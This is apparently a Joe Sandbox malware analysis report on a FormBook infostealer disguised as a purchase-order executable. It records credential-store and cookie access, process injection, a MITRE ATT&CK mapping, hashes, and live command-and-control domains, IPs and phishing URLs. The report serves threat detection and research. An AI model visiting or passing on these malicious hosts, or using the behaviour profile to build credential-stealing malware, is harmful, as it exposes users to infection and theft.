            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\RMActivate_ssp.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: PO2-2401-0016 (TR).exe Binary or memory string: WIN_81
            Source: PO2-2401-0016 (TR).exe Binary or memory string: WIN_XP
            Source: PO2-2401-0016 (TR).exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: PO2-2401-0016 (TR).exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: PO2-2401-0016 (TR).exeBinary or memory string: WIN_XPe
            Source: PO2-2401-0016 (TR).exeBinary or memory string: WIN_VISTA
            Source: PO2-2401-0016 (TR).exeBinary or memory string: WIN_7
            Source: PO2-2401-0016 (TR).exeBinary or memory string: WIN_8

            Remote Access Functionality

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.4509591514.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2279303551.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4509486697.0000000002A70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4511569074.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2283186633.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2280748926.0000000003C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4508334396.0000000000340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4509574666.0000000004560000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001D1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket | 0_2_001D1204
Source: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe | Code function: 0_2_001D1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket | 0_2_001D1806
MITRE ATT&CK Matrix (the number in parentheses is the report's hit count for that technique; techniques without a number were not observed)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Native API (1); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: DLL Side-Loading (1); Valid Accounts (2); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: Exploitation for Privilege Escalation (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (412); Startup Items; Scheduled Task/Job; At
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (3); DLL Side-Loading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (12); Access Token Manipulation (21); Process Injection (412)
Credential Access: OS Credential Dumping (1); Input Capture (21); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (116); Security Software Discovery (241); Virtualization/Sandbox Evasion (12); Process Discovery (3); Application Window Discovery (11); System Owner/User Discovery (1)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (21); Clipboard Data (3); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Ingress Tool Transfer (4); Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph
ID: 1511724 | Sample: PO2-2401-0016 (TR).exe | Start date: 16/09/2024 | Architecture: WINDOWS | Score: 100

Start
  DNS/IP: www.kckartal.xyz; www.golbasi-nakliyat.xyz (Performs DNS queries to domains with low reputation); 21 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 7 other signatures
  -> PO2-2401-0016 (TR).exe 1 (started)
     Signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process
     -> svchost.exe (started)
        Signatures: Maps a DLL or memory area into another process
        -> WwOlfblnYaWmLq.exe (injected)
           Signatures: Found direct / indirect Syscall (likely to bypass EDR)
           -> RMActivate_ssp.exe 13 (started)
              Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
              -> WwOlfblnYaWmLq.exe (injected)
                 DNS/IP: www.quilo.life 203.161.43.228, ports 58662, 58663, 58664, VNPT-AS-VNVNPTCorpVN, Malaysia; mfgamecompany.shop 185.173.111.76, ports 58658, 58659, 58660, TERRATRANSIT-ASDE, Germany; 11 other IPs or domains
                 Signatures: Found direct / indirect Syscall (likely to bypass EDR)
              -> firefox.exe (started)

Source | Detection | Scanner | Label | Link
PO2-2401-0016 (TR).exe | 48% | Virustotal | | Browse
PO2-2401-0016 (TR).exe | 50% | ReversingLabs | Win32.Trojan.Leonem |
PO2-2401-0016 (TR).exe | 100% | Avira | DR/AutoIt.Gen8 |
PO2-2401-0016 (TR).exe | 100% | Joe Sandbox ML | |
No Antivirus matches
No Antivirus matches
                              Joe Sandbox version:40.0.0 Tourmaline
                              Analysis ID:1511724
                              Start date and time:2024-09-16 09:28:09 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 10m 39s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:7
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:2
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:PO2-2401-0016 (TR).exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@7/2@18/13
                              EGA Information:
                              • Successful, ratio: 75%
                              HCA Information:
                              • Successful, ratio: 97%
                              • Number of executed functions: 43
                              • Number of non-executed functions: 297
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                              • Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Execution Graph export aborted for target WwOlfblnYaWmLq.exe, PID 2612 because it is empty
                              • Report creation exceeded maximum time and may have missing disassembly code information.
                              • Report size exceeded maximum capacity and may have missing disassembly code.
                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
03:30:00 | API Interceptor | 12179192x Sleep call for process: RMActivate_ssp.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
65.21.196.90 | FATURALAR PDF.exe | malicious | FormBook | www.030003112.xyz/dk22/
65.21.196.90 | Purchase order.exe | malicious | FormBook | www.070001350.xyz/zvc6/
65.21.196.90 | DOC092024-0431202229487.exe | malicious | FormBook | www.030002304.xyz/tmpg/
65.21.196.90 | Remittance advice.exe | malicious | FormBook | www.070001350.xyz/zvc6/
65.21.196.90 | doc330391202408011.exe | malicious | FormBook | www.030002060.xyz/oap7/
65.21.196.90 | DHL airwaybill # 6913321715 & BL Draft copy.exe | malicious | FormBook | www.030002721.xyz/i28e/
65.21.196.90 | yyyyyyyy.exe | malicious | FormBook | www.030002060.xyz/d629/?EN-hu=KAaEqqZfS4cDvU3Ij6Gom2nrmNT9tw2tnUHZxD+rCxnnN6LgNdSAGbreu7nZG1S4n6xTi0fmbnaWzdqJKm8Z7U+GaCKh7LK1IRPJE/WiiU/xJvV0/w==&zx=TzUh
65.21.196.90 | AUG 2024 SOA.exe | malicious | FormBook | www.070001294.xyz/ohwx/
65.21.196.90 | REQST_PRC 410240665_2024.exe | malicious | FormBook | www.030002060.xyz/oap7/
65.21.196.90 | REQST_PRC 410240.exe | malicious | FormBook | www.030002060.xyz/oap7/
185.104.29.12 | k8FSEGGo4d9blGr.exe | malicious | FormBook | www.groet.online/l4nl/
185.104.29.12 | PO#4510065525.exe | malicious | FormBook | www.groet.online/kdsf/
47.57.185.227 | AIDHL3290435890.exe | malicious | FormBook | www.726075.buzz/w9nd/
47.57.185.227 | PO#4510065525.exe | malicious | FormBook | www.726075.buzz/w9nd/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.quilo.life | Purchase Order TE- 00011-7777.exe | malicious | FormBook | 203.161.43.228
www.quilo.life | Payment confirmation 20240911.exe | malicious | FormBook | 203.161.43.228
www.quilo.life | PO 09110124 EXPRESS SYSTEM-SESB24066.exe | malicious | FormBook | 203.161.43.228
www.quilo.life | Doc_PO6900000827.exe | malicious | FormBook | 203.161.43.228
www.quilo.life | PO_20240906011824.exe | malicious | FormBook | 203.161.43.228
www.quilo.life | AIDHL3290435890.exe | malicious | FormBook | 203.161.43.228
www.quilo.life | PO#4510065525.exe | malicious | FormBook | 203.161.43.228
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CP-ASDE | file.exe | malicious | PureLog Stealer, RedLine, zgRAT | 65.21.18.51
CP-ASDE | FATURALAR PDF.exe | malicious | FormBook | 65.21.196.90
CP-ASDE | Purchase order.exe | malicious | FormBook | 65.21.196.90
CP-ASDE | file.exe | malicious | Amadey, Cryptbot, PureLog Stealer, RedLine, XWorm, zgRAT | 65.21.18.51
CP-ASDE | information_package.exe | malicious | NetSupport RAT, NetSupport Downloader, Stealc, Vidar | 65.21.99.150
CP-ASDE | DOC092024-0431202229487.exe | malicious | FormBook | 65.21.196.90
CP-ASDE | Remittance advice.exe | malicious | FormBook | 65.21.196.90
CP-ASDE | VMRhiAFJtl.exe | malicious | Amadey, Clipboard Hijacker, CryptOne, Cryptbot, PureLog Stealer, RedLine, Stealc | 65.21.18.51
CP-ASDE | http:///ipscanadvsf.com | malicious | Unknown | 65.21.119.50
CP-ASDE | XpCyBwDzEt.exe | malicious | Amadey, Clipboard Hijacker, CryptOne, Cryptbot, DanaBot, PureLog Stealer, RedLine | 65.21.18.51
AS-ZXCSNL | k8FSEGGo4d9blGr.exe | malicious | FormBook | 185.104.29.12
AS-ZXCSNL | rfOfF6s6gI.exe | malicious | FormBook | 185.104.28.238
AS-ZXCSNL | 4qV0xW2NSj.exe | malicious | FormBook | 185.104.28.238
AS-ZXCSNL | PO#4510065525.exe | malicious | FormBook | 185.104.29.12
AS-ZXCSNL | DHL_AWB#6078538091.exe | malicious | FormBook | 185.104.28.238
AS-ZXCSNL | DHL_AWB#6078538091.exe | malicious | FormBook | 185.104.28.238
AS-ZXCSNL | NEW RFQ - Viasat LSDR.exe | malicious | FormBook, PureLog Stealer | 185.104.28.238
AS-ZXCSNL | 502407267 RUAG FOODPLAZA.exe | malicious | DarkTortilla, FormBook | 185.104.28.238
AS-ZXCSNL | Att00173994.exe | malicious | FormBook | 185.104.28.238
AS-ZXCSNL | DHL Receipt_AWB#20240079104.exe | malicious | FormBook | 185.104.28.238
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | http://www.goo.su/fJu2F/ | malicious | Unknown | 47.253.61.56
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | SecuriteInfo.com.Win32.Agent-BCJF.26841.1442.exe | malicious | Unknown | 47.254.124.86
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | SecuriteInfo.com.Win32.Agent-BCJF.26841.1442.exe | malicious | Unknown | 47.254.124.86
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | https://procoinbaselogin.iwopop.com/ | malicious | Unknown | 8.209.107.39
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | http://hjc.pages.dev/account/js-reporting?crumb=uZ4.07kERLI&message=javascript_not_enabled&ref=/account/challenge/password | malicious | HTMLPhisher | 47.253.61.56
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | https://www.google.com/url?q=dCSMjVnvsqsqaP8pEWWm&rct=SpPq9HncUaCXUtCZusX0&sa=t&esrc=uZR6jk9A67Rj7RZhLuPE&source=&cd=eh0xIKCKpKh7i4kTt26p&cad=VEVtMkQKVNr1KW4fxShi&ved=NTDACygNXetEDbRT8YiY&uact=%20&url=amp/zoe-elefterin.com/M%2f13303%2FcXJzYy1xdWFsaXR5cmVwb3J0aW5nc2VydmljZWNlbnRlcmdyb3VwbWFpbGJveEBycmIuZ292 | malicious | HTMLPhisher | 47.253.61.56
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | http://vidaliaonion.org | malicious | Unknown | 47.253.61.56
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | SecuriteInfo.com.ELF.Agent-CPN.6229.9401.elf | malicious | Unknown | 8.209.214.118
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | Play_VM-Now(Vincent.morrissey)CQDM.html | malicious | HTMLPhisher | 147.139.142.100
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | Purchase Order TE- 00011-7777.exe | malicious | FormBook | 47.57.185.227
                              No context
                              No context
Process: C:\Windows\SysWOW64\RMActivate_ssp.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.121297215059106
Encrypted: false
SSDEEP: 384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5: D87270D0039ED3A5A72E7082EA71E305
SHA1: 0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256: F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512: 18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious: false
Reputation: high, very likely benign file
Process: C:\Users\user\Desktop\PO2-2401-0016 (TR).exe
File Type: data
Category: dropped
Size (bytes): 288768
Entropy (8bit): 7.99583954381082
Encrypted: true
SSDEEP: 6144:CQ5o4BoQpp74IpXEZlCSTrgzD7kXeGNYUFn1lQu8+B/e0s/ps:j5o4BoQpmgXEZlC4jNdHM0s/ps
MD5: 45E87BABE76331CC825D9ADF918B4026
SHA1: F1CDBED846EFD2BA78F91B5902120F2EA1803CDF
SHA-256: C9EF17FBFDEF24A4985FF1986CAF8F7847239881EB55005B118266F8DE359E36
SHA-512: 7E929D78968C5536A9BA35675D1687A9256A41D7F7180E8CBA56769EBF12E4F94231B17F6C9E8D37DD58F164020F4D6ADFB2AF914C41A13CCF6536360324A62D
Malicious: false
Reputation: low
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.476251115962216
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: PO2-2401-0016 (TR).exe
File size: 1'724'416 bytes
MD5: 6f8e7d082d8c039064cbcc813d24dcb4
SHA1: 2715db08498311cf04b28be93049916c6684685c
SHA256: 392d1c5876d7d023d9d207fd1b5badce5939abad6b4796adb79a292aefb6f574
SHA512: 5af8cf991138e57964490f8219b31a11c93ae26975cb45f87be04520285178ad587e957bf2fc582561a91e7d60437f0fade65a00904cf152c5ff6c5de86cab75
SSDEEP: 49152:gTvC/MTQYxsWR7a73AUUJQ5KVNPpEseZdTv:IjTQYxsWRAA3JbNPGTv
TLSH: 6F85E00273D1D022FF9B92334F9AF6515ABC79260123A61F13981DB9BE701B1563E7A3
                              File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
Icon Hash: aaf3e3e3938382a0
Entrypoint: 0x420577
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x66E76F38 [Sun Sep 15 23:35:20 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 948cc502fe9226992dce9417f952fce3
                              Instruction
                              call 00007FEE88E62233h
                              jmp 00007FEE88E61B3Fh
                              push ebp
                              mov ebp, esp
                              push esi
                              push dword ptr [ebp+08h]
                              mov esi, ecx
                              call 00007FEE88E61D1Dh
                              mov dword ptr [esi], 0049FDF0h
                              mov eax, esi
                              pop esi
                              pop ebp
                              retn 0004h
                              and dword ptr [ecx+04h], 00000000h
                              mov eax, ecx
                              and dword ptr [ecx+08h], 00000000h
                              mov dword ptr [ecx+04h], 0049FDF8h
                              mov dword ptr [ecx], 0049FDF0h
                              ret
                              push ebp
                              mov ebp, esp
                              push esi
                              push dword ptr [ebp+08h]
                              mov esi, ecx
                              call 00007FEE88E61CEAh
                              mov dword ptr [esi], 0049FE0Ch
                              mov eax, esi
                              pop esi
                              pop ebp
                              retn 0004h
                              and dword ptr [ecx+04h], 00000000h
                              mov eax, ecx
                              and dword ptr [ecx+08h], 00000000h
                              mov dword ptr [ecx+04h], 0049FE14h
                              mov dword ptr [ecx], 0049FE0Ch
                              ret
                              push ebp
                              mov ebp, esp
                              push esi
                              mov esi, ecx
                              lea eax, dword ptr [esi+04h]
                              mov dword ptr [esi], 0049FDD0h
                              and dword ptr [eax], 00000000h
                              and dword ptr [eax+04h], 00000000h
                              push eax
                              mov eax, dword ptr [ebp+08h]
                              add eax, 04h
                              push eax
                              call 00007FEE88E648DDh
                              pop ecx
                              pop ecx
                              mov eax, esi
                              pop esi
                              pop ebp
                              retn 0004h
                              lea eax, dword ptr [ecx+04h]
                              mov dword ptr [ecx], 0049FDD0h
                              push eax
                              call 00007FEE88E64928h
                              pop ecx
                              ret
                              push ebp
                              mov ebp, esp
                              push esi
                              mov esi, ecx
                              lea eax, dword ptr [esi+04h]
                              mov dword ptr [esi], 0049FDD0h
                              push eax
                              call 00007FEE88E64911h
                              test byte ptr [ebp+08h], 00000001h
                              pop ecx
                              Programming Language:
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc8e64 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd4000 | 0xce494 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1a3000 | 0x7594 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb0ff0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc3400 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb1010 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9c000 | 0x894 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x9ab1d | 0x9ac00 | 0a1473f3064dcbc32ef93c5c8a90f3a6 | False | 0.565500681542811 | data | 6.668273581389308 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9c000 | 0x2fb82 | 0x2fc00 | c9cf2468b60bf4f80f136ed54b3989fb | False | 0.35289185209424084 | data | 5.691811547483722 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xcc000 | 0x706c | 0x4800 | 53b9025d545d65e23295e30afdbd16d9 | False | 0.04356553819444445 | DOS executable (block device driver @\273\) | 0.5846666986982398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xd4000 | 0xce494 | 0xce600 | ad4811ecdd85a79aeb0a0f14a7665c9c | False | 0.9681892602967899 | data | 7.970595614197665 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x1a3000 | 0x7594 | 0x7600 | c68ee8931a32d45eb82dc450ee40efc3 | False | 0.7628111758474576 | data | 6.7972128181359786 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xd45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xd46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xd47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xd4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xd4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xd4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xd5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xd6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xd69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xd8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
